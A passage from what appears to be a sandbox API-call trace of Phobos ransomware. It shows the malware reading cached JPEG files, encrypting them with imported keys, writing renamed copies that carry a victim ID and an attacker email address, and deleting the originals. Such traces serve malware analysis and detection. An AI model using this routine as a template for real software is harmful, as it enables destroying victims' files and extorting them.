(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBO8ow[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbo8ow[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0185.855] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.856] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBO8ow[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbo8ow[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0185.856] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0185.856] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.856] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1e61, lpOverlapped=0x0) returned 1 [0185.894] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1e70, dwBufLen=0x1e70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1e70) returned 1 [0185.894] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1e70, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1e70, lpOverlapped=0x0) returned 1 [0185.895] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0185.895] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.895] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0185.895] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0185.895] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0185.895] CryptDestroyKey (hKey=0xa327e8) returned 1 [0185.895] CloseHandle (hObject=0x130) returned 1 [0185.896] CloseHandle (hObject=0xb8) returned 1 [0186.036] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBO8ow[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbo8ow[1].jpg")) returned 1 [0186.038] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0186.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOmar[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbomar[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.042] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=22149) returned 1 [0186.042] CloseHandle (hObject=0x178) returned 1 [0186.042] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOmar[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbomar[1].jpg")) returned 0x2020 [0186.042] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOmar[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbomar[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.042] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOmar[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbomar[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.042] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.042] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.043] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOmar[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbomar[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.044] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa328a8) returned 1 [0186.044] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.044] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x5685, lpOverlapped=0x0) returned 1 [0186.211] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5690, dwBufLen=0x5690 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5690) returned 1 [0186.212] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x5690, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x5690, lpOverlapped=0x0) returned 1 [0186.213] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0186.213] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.213] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0186.213] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.213] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0186.213] CryptDestroyKey (hKey=0xa328a8) returned 1 [0186.213] CloseHandle (hObject=0x178) returned 1 [0186.213] CloseHandle (hObject=0x140) returned 1 [0186.213] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOmar[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbomar[1].jpg")) returned 1 [0186.215] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0186.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBUPaj[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbupaj[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.215] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=9803) returned 1 [0186.215] CloseHandle (hObject=0x140) returned 1 [0186.216] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBUPaj[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbupaj[1].jpg")) returned 0x2020 [0186.216] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBUPaj[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbupaj[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBUPaj[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbupaj[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.216] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.216] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBUPaj[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbupaj[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.217] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa328a8) returned 1 [0186.217] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.217] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x264b, lpOverlapped=0x0) returned 1 [0186.255] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2650, dwBufLen=0x2650 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2650) returned 1 [0186.255] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2650, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2650, lpOverlapped=0x0) returned 1 [0186.256] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0186.256] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.256] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0186.256] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.256] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0186.257] CryptDestroyKey (hKey=0xa328a8) returned 1 [0186.257] CloseHandle (hObject=0x140) returned 1 [0186.257] CloseHandle (hObject=0x178) returned 1 [0186.257] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBUPaj[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbupaj[1].jpg")) returned 1 [0186.258] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0186.258] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVEOW[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbveow[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.259] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=15880) returned 1 [0186.259] CloseHandle (hObject=0x178) returned 1 [0186.259] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVEOW[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbveow[1].jpg")) returned 0x2020 [0186.259] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVEOW[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbveow[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.259] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVEOW[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbveow[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.259] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.259] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.259] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVEOW[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbveow[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.260] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa328a8) returned 1 [0186.260] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.260] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x3e08, lpOverlapped=0x0) returned 1 [0186.262] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3e10, dwBufLen=0x3e10 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3e10) returned 1 [0186.262] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3e10, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3e10, lpOverlapped=0x0) returned 1 [0186.264] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0186.264] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.264] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0186.264] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.264] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0186.264] CryptDestroyKey (hKey=0xa328a8) returned 1 [0186.264] CloseHandle (hObject=0x178) returned 1 [0186.264] CloseHandle (hObject=0x140) returned 1 [0186.264] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVEOW[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbveow[1].jpg")) returned 1 [0186.265] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0186.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVLcG[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbvlcg[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.266] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2591) returned 1 [0186.266] CloseHandle (hObject=0x140) returned 1 [0186.266] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVLcG[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbvlcg[1].jpg")) returned 0x2020 [0186.266] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVLcG[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbvlcg[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVLcG[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbvlcg[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.266] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.266] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVLcG[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbvlcg[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.267] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa328a8) returned 1 [0186.267] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.267] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xa1f, lpOverlapped=0x0) returned 1 [0186.284] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xa20, dwBufLen=0xa20 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xa20) returned 1 [0186.284] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xa20, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xa20, lpOverlapped=0x0) returned 1 [0186.285] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0186.285] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.285] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0186.285] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0186.285] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, 